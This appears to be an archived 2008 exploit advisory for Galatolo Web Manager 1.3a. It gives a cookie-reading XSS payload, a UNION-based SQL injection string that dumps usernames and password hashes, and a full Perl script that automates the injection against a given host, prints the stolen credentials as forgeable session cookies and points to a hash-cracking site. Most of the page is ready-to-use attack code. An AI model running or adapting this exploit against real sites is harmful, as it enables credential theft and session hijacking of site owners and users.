Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability
# Published : 2008-07-15
# Author : StAkeR
# Previous Title : tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
# Next Title : TalkBack 2.3.5 (language) Local File Inclusion Vulnerability

--==+============================================================================+==--
--==+   Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability    +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 14 Jul 2008
 [+] Download: http://gwm.dev-area.org/view.php?id=8

 [*] Vulnerabilities:
 
 [*] XSS <= 1.3a
 [+] all.php?tag= [Code Javascript]
 [+] http://site.com/all.php?tag=<script>alert(document.cookie)</script>
 
 [*] SQL (plugin users) 1.3a
 [+] plugins/users/index.php?id= [Code SQL]
 [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
 
 [*] Exploit:

 #!/usr/bin/perl 
 use strict;
 use LWP::UserAgent;

 my $host = shift;
 my ($start,$content,@login);
 my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";

 if($host =~ /^http://?/i)
 {
   $start = new LWP::UserAgent or die "[+] Unable to connectn";
   $start->timeout(1);
   $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
   $content = $start->get($host.$evilxx);
  
   if($content->is_success)
   {
     if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
     {
       push(@login,$1,$2);
       print "[+] Login:n";
       print "[+] Username: $login[0]n";
       print "[+] Password: $login[1]nn";
      
       print "[+] Cookie Session:n";
       print "[+] gwm_user = $login[0]n";
       print "[+] gwm_pass = $login[1]nn";
      
       print "[+] Crack Password:n";
       print "[+] md5(md5(password)) for crack:n"; 
       print "[+] http://passcracking.comn";
     }
     else
     {
       print "[+] Exploit Failedn";
       print "[+] Site Not Vulnerablen";
     }
   }
 }
 else
 {
   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injectionn";
   print "[+] Exploit Coded By: StAkeR ~ StAkeR@hotmail.itnn";
   print "[+] Usage: Perl $0 <host>n";
   print "[+] Usage: Perl $0 http://site.comn";
 }

# www.Syue.com [2008-07-15]